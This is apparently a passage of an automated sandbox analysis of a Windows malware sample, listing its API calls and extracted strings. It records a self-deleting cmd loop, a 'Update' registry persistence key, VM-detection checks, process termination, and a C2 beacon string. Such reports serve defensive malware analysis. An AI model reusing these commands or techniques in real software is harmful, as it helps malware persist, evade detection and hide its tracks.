    • /q /c for /l %%i in (1, 1, 4000000000) do if not exist "%s" (exit) else (del /f "%s"), xrefs:
    • ComSpec, xrefs:
    APIs
    • GetModuleHandleW.KERNEL32(?), ref: 004018A5
    • GetProcAddress.KERNEL32(?,?), ref: 004018B1
    • VirtualAlloc.KERNEL32(00000000), ref: 004018DD
    • VirtualFree.KERNEL32(01010000,00000000,00008000), ref: 00401924
    Strings
    APIs
    • _alloca_probe.NTDLL ref: 004137D5
    • _snprintf.NTDLL ref: 004137FC
    • RtlGetLastWin32Error.NTDLL ref: 00413808
    • CreateFileA.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 00413829
    • RtlGetLastWin32Error.NTDLL ref: 00413836
    • memset.NTDLL(?,00000000), ref: 00413872
    • DeviceIoControl.KERNEL32(?,002D1400,?,0000000C,?,00002000,?,00000000), ref: 0041389B
    • RtlGetLastWin32Error.NTDLL ref: 004138A5
    • CloseHandle.KERNEL32 ref: 004138AE
      • Part of subcall function 00413680: tolower.NTDLL ref: 004136B2
      • Part of subcall function 00413680: isspace.NTDLL ref: 004136BD
      • Part of subcall function 00413680: isprint.NTDLL ref: 00413709
      • Part of subcall function 00413680: isprint.NTDLL ref: 00413733
      • Part of subcall function 00413680: isspace.NTDLL ref: 00413785
    • CloseHandle.KERNEL32 ref: 004138F1
    • CloseHandle.KERNEL32 ref: 00413917
    Strings
    APIs
    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 004109FE
    • RegQueryValueExA.ADVAPI32(?,?,?,?,?,?), ref: 00410A36
    • lstrlen.KERNEL32(DtbkysreQKna4DY9nAS2Fzn9sRFFyTQYFsTBGH92T), ref: 00410A4B
    • RegQueryValueExA.ADVAPI32(00000000,?,00000000,00000000,?,?), ref: 00410A9C
    • lstrlen.KERNEL32(DtbkysreQKna4DY9nAS2Fzn9sRFFyTQYFsTBGH92T), ref: 00410AAB
    • RegQueryValueExA.ADVAPI32(00000000,?,00000000,00000000,?,?), ref: 00410AFC
    • lstrlen.KERNEL32(DtbkysreQKna4DY9nAS2Fzn9sRFFyTQYFsTBGH92T), ref: 00410B0D
    • RegCloseKey.ADVAPI32(?), ref: 00410B3C
    Strings
    APIs
    • GetModuleHandleW.KERNEL32(00000000), ref: 004010D0
    • strncpy.NTDLL(?,?), ref: 00401106
    • lstrlen.KERNEL32(?), ref: 00401116
    • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 00401125
    • _snprintf.NTDLL ref: 00401145
    • GetEnvironmentVariableA.KERNEL32(ComSpec,?,00000104), ref: 0040115C
    • ShellExecuteA.SHELL32(00000000,00000000,?,?,00000000,00000000), ref: 00401177
    Strings
    • QnY8EHt, xrefs: 004010DB
    • /q /c for /l %%i in (1, 1, 4000000000) do if not exist "%s" (exit) else (del /f "%s"), xrefs: 00401133
    • ComSpec, xrefs: 00401157
    APIs
    • LocalFree.KERNEL32 ref: 00412473
    • LocalFree.KERNEL32 ref: 00412478
    • GetTempPathW.KERNEL32(00000104,?), ref: 00412494
    • GetTempFileNameW.KERNEL32(?,tmp,?,?), ref: 004124B5
    • lstrcatW.KERNEL32(?,?), ref: 004124CC
    • CreateFileW.KERNEL32(?,10000000,00000000,00000000,00000002,00000080,00000000), ref: 004124E9
    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00412507
    • CloseHandle.KERNEL32 ref: 0041250E
      • Part of subcall function 00412B70: LocalFree.KERNEL32 ref: 00412B8D
      • Part of subcall function 00412B70: LocalFree.KERNEL32 ref: 00412B92
    • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 00412526
    Strings
    APIs
    • RegCreateKeyExA.ADVAPI32 ref: 00413D54
    • RegQueryValueExA.ADVAPI32(?,VideoBiosVersion,00000000,?,?,?), ref: 00413D92
    • RegCloseKey.ADVAPI32 ref: 00413D9C
    • CharUpperBuffA.USER32(?,?), ref: 00413DAC
    • strstr.NTDLL(?), ref: 00413DBC
    Strings
    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413AAB
    • memset.NTDLL(?,00000000), ref: 00413AC8
    • Process32FirstW.KERNEL32(?,?), ref: 00413ADE
    • lstrcmpiW.KERNEL32(?), ref: 00413B0C
    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00413B1B
    • TerminateProcess.KERNEL32(?,000000FF), ref: 00413B26
    • CloseHandle.KERNEL32 ref: 00413B2D
    • lstrcmpiW.KERNEL32(?), ref: 00413B42
    • Process32NextW.KERNEL32(?,?), ref: 00413B5B
      • Part of subcall function 004139F0: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00413A18
      • Part of subcall function 004139F0: Thread32First.KERNEL32 ref: 00413A3F
      • Part of subcall function 004139F0: OpenThread.KERNEL32(00000002,00000000,?), ref: 00413A73
      • Part of subcall function 004139F0: SuspendThread.KERNEL32 ref: 00413A78
      • Part of subcall function 004139F0: CloseHandle.KERNEL32 ref: 00413A7B
      • Part of subcall function 004139F0: Thread32Next.KERNEL32(?,?), ref: 00413A87
      • Part of subcall function 004139F0: CloseHandle.KERNEL32 ref: 00413A95
    • CloseHandle.KERNEL32 ref: 00413B67
    APIs
    • memset.NTDLL(C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\5d5Edbi7R.bmp,00000000), ref: 00414732
    • GetTempPathW.KERNEL32(00000104), ref: 00414743
    • RtlGetLastWin32Error.NTDLL ref: 0041474D
    • _snwprintf.NTDLL(C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\5d5Edbi7R.bmp,00000207,%s%S.bmp,?,?), ref: 00414776
    • CreateFileW.KERNEL32(C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\5d5Edbi7R.bmp,10000000,00000000,00000000,00000003,00000080,00000000), ref: 00414795
    • CloseHandle.KERNEL32 ref: 004147AD
      • Part of subcall function 00414200: CoCreateInstance.OLE32(00419288,00000000,00000001,0041988C,p~7), ref: 00414221
      • Part of subcall function 00414200: CoCreateInstance.OLE32(00419278,00000000,00000001,004192E8,0041BA90), ref: 00414242
      • Part of subcall function 00414200: CoCreateInstance.OLE32(00419298,00000000,00000001,0041993C,0041BA7C), ref: 00414284
      • Part of subcall function 00414200: CoCreateInstance.OLE32(0041986C,00000000,00000001,0041989C,0041BA98), ref: 00414381
      • Part of subcall function 00414200: memset.NTDLL(?,00000000), ref: 004143D7
      • Part of subcall function 00414200: CoCreateInstance.OLE32(0041987C,00000000,00000001,0041989C,0041BAA0), ref: 00414484
      • Part of subcall function 00414200: GetProcessHeap.KERNEL32 ref: 0041457E
      • Part of subcall function 00414200: RtlAllocateHeap.NTDLL ref: 00414585
      • Part of subcall function 00414200: RtlGetLastWin32Error.NTDLL ref: 00414594
      • Part of subcall function 00414200: CreateFileW.KERNEL32(C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\5d5Edbi7R.bmp,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00414659
      • Part of subcall function 00414200: RtlGetLastWin32Error.NTDLL ref: 00414666
      • Part of subcall function 00414200: WriteFile.KERNEL32(?,?,0000000E,?,00000000), ref: 004146A3
      • Part of subcall function 00414200: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004146B2
      • Part of subcall function 00414200: WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 004146C8
      • Part of subcall function 00414200: CloseHandle.KERNEL32 ref: 004146CB
      • Part of subcall function 00414200: CoTaskMemFree.OLE32(?), ref: 004146DC
    Strings
    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00413A18
    • Thread32First.KERNEL32 ref: 00413A3F
    • OpenThread.KERNEL32(00000002,00000000,?), ref: 00413A73
    • SuspendThread.KERNEL32 ref: 00413A78
    • CloseHandle.KERNEL32 ref: 00413A7B
    • Thread32Next.KERNEL32(?,?), ref: 00413A87
    • CloseHandle.KERNEL32 ref: 00413A95
    APIs
    • GetWindow.USER32(00000008,00000004), ref: 00418448
    • EnableWindow.USER32(?,00000000), ref: 00418458
    • GetMessageW.USER32(00000008,00000005), ref: 0041846F
    • KiUserApcDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 0041848B
    • TranslateMessage.USER32(?), ref: 004184AD
    • DispatchMessageW.USER32(?), ref: 004184B8
    • EnableWindow.USER32(?,00000001), ref: 004184C7
    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041401B
    • memset.NTDLL(?,00000000), ref: 0041403E
    • Process32FirstW.KERNEL32(?,?), ref: 00414056
    • lstrcmpiW.KERNEL32(?,0041B01C), ref: 0041407C
    • Process32NextW.KERNEL32(?,?), ref: 00414094
    • CloseHandle.KERNEL32 ref: 004140A0
    APIs
    Strings
    APIs
    • RegCreateKeyExA.ADVAPI32(00419494,?,00000000,00000000,00000000,00000002,00000000,?,?), ref: 004011CF
    • lstrlen.KERNEL32(?), ref: 004011DC
    • RegSetValueExA.ADVAPI32(?,Update,?,00000001,?), ref: 004011F1
    • RegCloseKey.ADVAPI32(?), ref: 004011FA
    Strings
    APIs
    • DestroyWindow.USER32(00000008), ref: 004183BD
    • CreateWindowExW.USER32 ref: 00418406
    • RtlGetLastWin32Error.NTDLL ref: 00418418
    Strings
    • 59FFB769-5787-4181-A4F0-949BF67A7793, xrefs: 004183F0
    APIs
    Strings
    • 59FFB769-5787-4181-A4F0-949BF67A7793, xrefs: 00418377
    APIs
    • VirtualAlloc.KERNEL32(00000000,0000EB59,00001000,00000004), ref: 00401970
      • Part of subcall function 004017E0: GetModuleHandleW.KERNEL32(?), ref: 004018A5
      • Part of subcall function 004017E0: GetProcAddress.KERNEL32(?,?), ref: 004018B1
      • Part of subcall function 004017E0: VirtualAlloc.KERNEL32(00000000), ref: 004018DD
      • Part of subcall function 004017E0: VirtualFree.KERNEL32(01010000,00000000,00008000), ref: 00401924
    • VirtualAlloc.KERNEL32(00000000,01010008,00001000,00000004), ref: 004019E4
    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00401A18
    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00401A48
    • VirtualFree.KERNEL32(01010000,00000000,00008000), ref: 00401A52
    APIs
    • RegCreateKeyExA.ADVAPI32(80000002,?,00000000,00000000), ref: 004106A1
    • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00020006,00000000,?,?), ref: 004106CE
    • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004), ref: 004106F0
    • RegCloseKey.ADVAPI32(?), ref: 004106FD
    APIs
    • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019), ref: 00410746
    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00410768
    • RegQueryValueExA.ADVAPI32(00020019,?,00000000,00000000,?,?), ref: 00410795
    • RegCloseKey.ADVAPI32(?), ref: 004107A4
    APIs
    • LocalFree.KERNEL32 ref: 00416073
    • LocalFree.KERNEL32 ref: 00416078
    • LocalFree.KERNEL32 ref: 004160EE
    • LocalFree.KERNEL32 ref: 004160F3
      • Part of subcall function 00412BF0: LocalAlloc.KERNEL32(00000040), ref: 00412C29
      • Part of subcall function 00412BF0: LocalFree.KERNEL32 ref: 00412C46
      • Part of subcall function 00412BF0: LocalFree.KERNEL32 ref: 00412C4B
      • Part of subcall function 00412BF0: LocalAlloc.KERNEL32(00000040,00000008), ref: 00412C5F
    APIs
    • CoCreateInstance.OLE32(004192F8,00000000,00000001,0041A124,?), ref: 004159CF
    • GetClientRect.USER32(?,?), ref: 00415AAA
      • Part of subcall function 004175D0: LocalAlloc.KERNEL32(00000040,00000058), ref: 004175E3
      • Part of subcall function 004175D0: LocalAlloc.KERNEL32(00000040,00000048), ref: 0041762F
    • DestroyWindow.USER32 ref: 00415B68
    APIs
    • memset.NTDLL(?,00000000), ref: 00413942
    • GetCurrentHwProfileW.ADVAPI32 ref: 0041394E
      • Part of subcall function 004137D0: _alloca_probe.NTDLL ref: 004137D5
      • Part of subcall function 004137D0: _snprintf.NTDLL ref: 004137FC
      • Part of subcall function 004137D0: RtlGetLastWin32Error.NTDLL ref: 00413808
      • Part of subcall function 004137D0: CreateFileA.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 00413829
      • Part of subcall function 004137D0: RtlGetLastWin32Error.NTDLL ref: 00413836
      • Part of subcall function 004137D0: memset.NTDLL(?,00000000), ref: 00413872
      • Part of subcall function 004137D0: DeviceIoControl.KERNEL32(?,002D1400,?,0000000C,?,00002000,?,00000000), ref: 0041389B
      • Part of subcall function 004137D0: RtlGetLastWin32Error.NTDLL ref: 004138A5
      • Part of subcall function 004137D0: CloseHandle.KERNEL32 ref: 004138AE
      • Part of subcall function 004137D0: CloseHandle.KERNEL32 ref: 004138F1
      • Part of subcall function 004137D0: CloseHandle.KERNEL32 ref: 00413917
    Non-executed Functions
    APIs
    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00413BC8
    • DuplicateToken.ADVAPI32(00000000,?,?), ref: 00413BE1
    • FreeSid.ADVAPI32(?,?,?,?,004013E3), ref: 00413BF4
    APIs
      • Part of subcall function 00410710: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019), ref: 00410746
      • Part of subcall function 00410710: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00410768
      • Part of subcall function 00410710: RegQueryValueExA.ADVAPI32(00020019,?,00000000,00000000,?,?), ref: 00410795
      • Part of subcall function 00410710: RegCloseKey.ADVAPI32(?), ref: 004107A4
    • GetSystemTime.KERNEL32(?), ref: 004107D0
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 004107E0
    • RtlTimeToSecondsSince1970.NTDLL ref: 004107F8
      • Part of subcall function 00410660: RegCreateKeyExA.ADVAPI32(80000002,?,00000000,00000000), ref: 004106A1
      • Part of subcall function 00410660: RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00020006,00000000,?,?), ref: 004106CE
      • Part of subcall function 00410660: RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004), ref: 004106F0
      • Part of subcall function 00410660: RegCloseKey.ADVAPI32(?), ref: 004106FD
    APIs
      • Part of subcall function 00413D20: RegCreateKeyExA.ADVAPI32 ref: 00413D54
      • Part of subcall function 00413D20: RegQueryValueExA.ADVAPI32(?,VideoBiosVersion,00000000,?,?,?), ref: 00413D92
      • Part of subcall function 00413D20: RegCloseKey.ADVAPI32 ref: 00413D9C
      • Part of subcall function 00413D20: CharUpperBuffA.USER32(?,?), ref: 00413DAC
      • Part of subcall function 00413D20: strstr.NTDLL(?), ref: 00413DBC
      • Part of subcall function 004137D0: _alloca_probe.NTDLL ref: 004137D5
      • Part of subcall function 004137D0: _snprintf.NTDLL ref: 004137FC
      • Part of subcall function 004137D0: RtlGetLastWin32Error.NTDLL ref: 00413808
      • Part of subcall function 004137D0: CreateFileA.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 00413829
      • Part of subcall function 004137D0: RtlGetLastWin32Error.NTDLL ref: 00413836
      • Part of subcall function 004137D0: memset.NTDLL(?,00000000), ref: 00413872
      • Part of subcall function 004137D0: DeviceIoControl.KERNEL32(?,002D1400,?,0000000C,?,00002000,?,00000000), ref: 0041389B
      • Part of subcall function 004137D0: RtlGetLastWin32Error.NTDLL ref: 004138A5
      • Part of subcall function 004137D0: CloseHandle.KERNEL32 ref: 004138AE
      • Part of subcall function 004137D0: CloseHandle.KERNEL32 ref: 004138F1
      • Part of subcall function 004137D0: CloseHandle.KERNEL32 ref: 00413917
    • lstrlen.KERNEL32(?), ref: 00413E37
    • CharUpperBuffA.USER32(?), ref: 00413E3F
    • lstrlen.KERNEL32(?), ref: 00413E49
    • CharUpperBuffA.USER32(?), ref: 00413E54
    • strstr.NTDLL(?), ref: 00413E60
    • strstr.NTDLL(?), ref: 00413E7A
    • strstr.NTDLL(?), ref: 00413E94
    • strstr.NTDLL(?), ref: 00413EAE
    • strstr.NTDLL(?), ref: 00413EC8
    • strstr.NTDLL(?), ref: 00413EE2
    • strstr.NTDLL(?), ref: 00413EFF
    • strstr.NTDLL(?), ref: 00413F1C
    • GetModuleHandleW.KERNEL32(00000000), ref: 00413F4C
    • strncpy.NTDLL(?,?), ref: 00413F85
    • lstrlen.KERNEL32(?), ref: 00413F95
    • lstrlen.KERNEL32(?), ref: 00413FA3
    • CharUpperBuffA.USER32(?), ref: 00413FAE
    • strstr.NTDLL(?), ref: 00413FBD
    • strstr.NTDLL(?), ref: 00413FD6
    • strstr.NTDLL(?), ref: 00413FEF
    APIs
    • GetProcessHeap.KERNEL32 ref: 00412677
    • RtlAllocateHeap.NTDLL(?,?,7E418F9C), ref: 0041267A
    • memset.NTDLL(?,00000000), ref: 0041268E
      • Part of subcall function 00413DD0: lstrlen.KERNEL32(?), ref: 00413E37
      • Part of subcall function 00413DD0: CharUpperBuffA.USER32(?), ref: 00413E3F
      • Part of subcall function 00413DD0: lstrlen.KERNEL32(?), ref: 00413E49
      • Part of subcall function 00413DD0: CharUpperBuffA.USER32(?), ref: 00413E54
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413E60
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413E7A
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413E94
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413EAE
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413EC8
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413EE2
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413EFF
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413F1C
      • Part of subcall function 00413DD0: GetModuleHandleW.KERNEL32(00000000), ref: 00413F4C
      • Part of subcall function 00413DD0: strncpy.NTDLL(?,?), ref: 00413F85
      • Part of subcall function 00413DD0: lstrlen.KERNEL32(?), ref: 00413F95
      • Part of subcall function 00413DD0: lstrlen.KERNEL32(?), ref: 00413FA3
      • Part of subcall function 00413DD0: CharUpperBuffA.USER32(?), ref: 00413FAE
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413FBD
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413FD6
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413FEF
    • ExitProcess.KERNEL32(00001B8B), ref: 004126B6
      • Part of subcall function 00410E10: _vsnprintf.NTDLL(ver=0.0.0.3&subid=6369&os=2600&idx=2206633207&langid=1033&width=800&height=600&ip=178.18.17.204&loc=Anonymous Proxy&isp=FiberMax Networks BV,000003FF,?,?,?,7E418F9C,00412995,?,00000000,00000000,00000000,00000003,000018E1,?,83868CF7), ref: 00410E3A
    • GetProcessHeap.KERNEL32 ref: 004126E9
    • RtlFreeHeap.NTDLL ref: 004126EC
    • lstrlen.KERNEL32 ref: 00412715
      • Part of subcall function 004150B0: GetTickCount.KERNEL32 ref: 004150D0
      • Part of subcall function 004150B0: LocalAlloc.KERNEL32(00000000), ref: 004150F5
      • Part of subcall function 004150B0: RtlGetLastWin32Error.NTDLL ref: 004150FF
      • Part of subcall function 004150B0: memcpy.NTDLL(?,?,?,?,?,7C80AC61,?,7C80BE56), ref: 00415113
      • Part of subcall function 004150B0: _snprintf.NTDLL ref: 00415155
      • Part of subcall function 004150B0: LocalAlloc.KERNEL32(00000000), ref: 00415185
      • Part of subcall function 004150B0: memset.NTDLL(?,00000000), ref: 0041519B
      • Part of subcall function 004150B0: LocalAlloc.KERNEL32(00000000,00008000), ref: 004151B2
      • Part of subcall function 004150B0: memset.NTDLL(?,00000000), ref: 004151CA
      • Part of subcall function 004150B0: LocalAlloc.KERNEL32(00000000), ref: 004151DE
      • Part of subcall function 004150B0: memset.NTDLL(?,00000000), ref: 004151F0
      • Part of subcall function 004150B0: socket.WS2_32(00000002,00000001,00000006), ref: 00415254
      • Part of subcall function 004150B0: htons.WS2_32(00000050), ref: 0041528B
      • Part of subcall function 004150B0: gethostbyname.WS2_32(?), ref: 0041529E
      • Part of subcall function 004150B0: memcpy.NTDLL(?), ref: 004152B8
      • Part of subcall function 004150B0: connect.WS2_32(?,?,00000010), ref: 004152C8
      • Part of subcall function 004150B0: inet_addr.WS2_32(?), ref: 004152DC
      • Part of subcall function 004150B0: _snprintf.NTDLL ref: 00415310
      • Part of subcall function 004150B0: _snprintf.NTDLL ref: 0041532D
      • Part of subcall function 004150B0: _snprintf.NTDLL ref: 00415379
      • Part of subcall function 004150B0: send.WS2_32(?,?,?,00000000), ref: 0041544E
      • Part of subcall function 004150B0: memset.NTDLL(?,00000000), ref: 00415464
      • Part of subcall function 004150B0: recv.WS2_32(?,?,00008000,00000000), ref: 00415480
      • Part of subcall function 004150B0: recv.WS2_32(?,?,00008000,00000000), ref: 00415499
      • Part of subcall function 004150B0: strstr.NTDLL ref: 004154DA
      • Part of subcall function 004150B0: LocalFree.KERNEL32(?), ref: 00415564
      • Part of subcall function 004150B0: LocalFree.KERNEL32 ref: 0041556F
      • Part of subcall function 004150B0: LocalFree.KERNEL32(?), ref: 0041557E
      • Part of subcall function 004150B0: closesocket.WS2_32 ref: 0041558E
      • Part of subcall function 004150B0: LocalFree.KERNEL32(?), ref: 00415599
    • lstrlen.KERNEL32 ref: 00412737
    • lstrlen.KERNEL32 ref: 00412759
    • GetProcessHeap.KERNEL32 ref: 0041276A
    • RtlFreeHeap.NTDLL ref: 00412771
      • Part of subcall function 00414010: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041401B
      • Part of subcall function 00414010: memset.NTDLL(?,00000000), ref: 0041403E
      • Part of subcall function 00414010: Process32FirstW.KERNEL32(?,?), ref: 00414056
      • Part of subcall function 00414010: lstrcmpiW.KERNEL32(?,0041B01C), ref: 0041407C
      • Part of subcall function 00414010: Process32NextW.KERNEL32(?,?), ref: 00414094
      • Part of subcall function 00414010: CloseHandle.KERNEL32 ref: 004140A0
      • Part of subcall function 004140C0: GetModuleHandleA.KERNEL32(0041B020), ref: 004140D7
    Strings
    • ver=0.0.0.3&subid=6369&os=2600&idx=2206633207&langid=1033&width=800&height=600&ip=178.18.17.204&loc=Anonymous Proxy&isp=FiberMax Networks BV, xrefs: 0041266F, 004126CF
    APIs
    • GetModuleHandleW.KERNEL32(00000000), ref: 00401337
    • strncpy.NTDLL(?,?), ref: 00401364
    • lstrlen.KERNEL32(?), ref: 00401371
    • strrchr.NTDLL(?,0000005C), ref: 00401381
    • GetVersionExW.KERNEL32(?), ref: 004013A2
    • SHGetFolderPathA.SHELL32(00000000,0000801A,00000000,00000000,?), ref: 004013C6
    • RtlGetLastWin32Error.NTDLL ref: 004013D0
    • lstrcat.KERNEL32(?,?), ref: 00401403
      • Part of subcall function 00413B90: AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00413BC8
      • Part of subcall function 00413B90: DuplicateToken.ADVAPI32(00000000,?,?), ref: 00413BE1
      • Part of subcall function 00413B90: FreeSid.ADVAPI32(?,?,?,?,004013E3), ref: 00413BF4
    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004013ED
    • lstrcat.KERNEL32(?,00419500), ref: 004013FF
    APIs
      • Part of subcall function 004109D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 004109FE
      • Part of subcall function 004109D0: RegQueryValueExA.ADVAPI32(?,?,?,?,?,?), ref: 00410A36
      • Part of subcall function 004109D0: lstrlen.KERNEL32(DtbkysreQKna4DY9nAS2Fzn9sRFFyTQYFsTBGH92T), ref: 00410A4B
      • Part of subcall function 004109D0: RegQueryValueExA.ADVAPI32(00000000,?,00000000,00000000,?,?), ref: 00410A9C
      • Part of subcall function 004109D0: lstrlen.KERNEL32(DtbkysreQKna4DY9nAS2Fzn9sRFFyTQYFsTBGH92T), ref: 00410AAB
      • Part of subcall function 004109D0: RegQueryValueExA.ADVAPI32(00000000,?,00000000,00000000,?,?), ref: 00410AFC
      • Part of subcall function 004109D0: lstrlen.KERNEL32(DtbkysreQKna4DY9nAS2Fzn9sRFFyTQYFsTBGH92T), ref: 00410B0D
      • Part of subcall function 004109D0: RegCloseKey.ADVAPI32(?), ref: 00410B3C
      • Part of subcall function 00413500: GetProcessHeap.KERNEL32 ref: 00413528
      • Part of subcall function 00413500: RtlAllocateHeap.NTDLL(?,?,7C90FE21), ref: 0041352B
      • Part of subcall function 00413500: InternetOpenA.WININET(Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0),00000001,00000000,00000000,00000000), ref: 0041354D
      • Part of subcall function 00413500: InternetOpenUrlA.WININET(?,?,00000000,00000000,04080000,00000000), ref: 0041356C
      • Part of subcall function 00413500: RtlGetLastWin32Error.NTDLL ref: 0041357A
      • Part of subcall function 00413500: GetProcessHeap.KERNEL32 ref: 00413583
      • Part of subcall function 00413500: RtlFreeHeap.NTDLL ref: 00413586
      • Part of subcall function 00413500: GetProcessHeap.KERNEL32 ref: 004135A5
      • Part of subcall function 00413500: RtlAllocateHeap.NTDLL(?,?,?), ref: 004135A8
      • Part of subcall function 00413500: InternetReadFile.WININET(00000000,?,00010000,?), ref: 004135CD
      • Part of subcall function 00413500: GetProcessHeap.KERNEL32 ref: 004135F3
      • Part of subcall function 00413500: RtlReAllocateHeap.NTDLL(?,?,00040000), ref: 004135F6
      • Part of subcall function 00413500: memcpy.NTDLL(?,?,?,?,00010000,?,?,?,?), ref: 00413613
      • Part of subcall function 00413500: InternetReadFile.WININET(?,?,00010000,?), ref: 0041363F
      • Part of subcall function 00413500: InternetCloseHandle.WININET(00000000), ref: 00413654
      • Part of subcall function 00413500: InternetCloseHandle.WININET(?), ref: 00413663
      • Part of subcall function 00413500: GetProcessHeap.KERNEL32 ref: 0041366C
      • Part of subcall function 00413500: RtlFreeHeap.NTDLL ref: 0041366F
      • Part of subcall function 00410B50: strstr.NTDLL ref: 00410B77
      • Part of subcall function 00410B50: memcpy.NTDLL(00000507,?,?,?,?,0000001C,?,178.18.17.204,?), ref: 00410B8A
    • strncmp.NTDLL(Anonymous Proxy, , ), ref: 00410CF3
      • Part of subcall function 00410830: RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000), ref: 00410871
      • Part of subcall function 00410830: lstrlen.KERNEL32(178.18.17.204), ref: 0041088A
      • Part of subcall function 00410830: lstrlen.KERNEL32(DtbkysreQKna4DY9nAS2Fzn9sRFFyTQYFsTBGH92T), ref: 00410894
      • Part of subcall function 00410830: lstrlen.KERNEL32(178.18.17.204), ref: 004108C2
      • Part of subcall function 00410830: RegSetValueExA.ADVAPI32(?,?,00000000,00000003,?), ref: 004108E5
      • Part of subcall function 00410830: lstrlen.KERNEL32(Anonymous Proxy), ref: 004108F6
      • Part of subcall function 00410830: lstrlen.KERNEL32(DtbkysreQKna4DY9nAS2Fzn9sRFFyTQYFsTBGH92T), ref: 00410900
      • Part of subcall function 00410830: lstrlen.KERNEL32(Anonymous Proxy), ref: 0041092E
      • Part of subcall function 00410830: RegSetValueExA.ADVAPI32(?,?,00000000,00000003,?), ref: 0041094C
      • Part of subcall function 00410830: lstrlen.KERNEL32(FiberMax Networks BV), ref: 00410959
      • Part of subcall function 00410830: lstrlen.KERNEL32(DtbkysreQKna4DY9nAS2Fzn9sRFFyTQYFsTBGH92T), ref: 00410963
      • Part of subcall function 00410830: lstrlen.KERNEL32(FiberMax Networks BV), ref: 00410991
      • Part of subcall function 00410830: RegSetValueExA.ADVAPI32(?,?,00000000,00000003,?), ref: 004109AF
      • Part of subcall function 00410830: RegCloseKey.ADVAPI32(?), ref: 004109B8
    • GetProcessHeap.KERNEL32 ref: 00410D84
    • RtlFreeHeap.NTDLL ref: 00410D8B
    APIs
    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019), ref: 004012C4
    • RegDeleteValueA.ADVAPI32 ref: 004012E5
    • RegDeleteValueA.ADVAPI32(00000000), ref: 004012F8
    • RegDeleteValueA.ADVAPI32(00000000), ref: 0040130A
    • RegCloseKey.ADVAPI32(00000000), ref: 00401311
    APIs
    • RegCreateKeyExA.ADVAPI32(00419494,?,00000000,00000000,00000000,00000002,00000000,?,?), ref: 0040125F
    • RegDeleteValueA.ADVAPI32(?,Update), ref: 0040127F
    • RegCloseKey.ADVAPI32(?), ref: 0040128A
    APIs
    • LocalAlloc.KERNEL32(00000000), ref: 00414FFD
    • memset.NTDLL(?,00000000), ref: 0041501B
    • LocalFree.KERNEL32 ref: 00415042
    • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,71AB676F), ref: 0041508F
    • LocalFree.KERNEL32 ref: 00415098
    APIs
    • LocalAlloc.KERNEL32(00000040,00000028), ref: 0041577E
    • LocalFree.KERNEL32 ref: 004157B8
    • LocalAlloc.KERNEL32(00000040,00000008), ref: 004157C9
    APIs
    • memset.NTDLL ref: 00411659
    • wsprintfA.USER32(?,004195A8), ref: 0041166E
      • Part of subcall function 00413DD0: lstrlen.KERNEL32(?), ref: 00413E37
      • Part of subcall function 00413DD0: CharUpperBuffA.USER32(?), ref: 00413E3F
      • Part of subcall function 00413DD0: lstrlen.KERNEL32(?), ref: 00413E49
      • Part of subcall function 00413DD0: CharUpperBuffA.USER32(?), ref: 00413E54
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413E60
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413E7A
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413E94
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413EAE
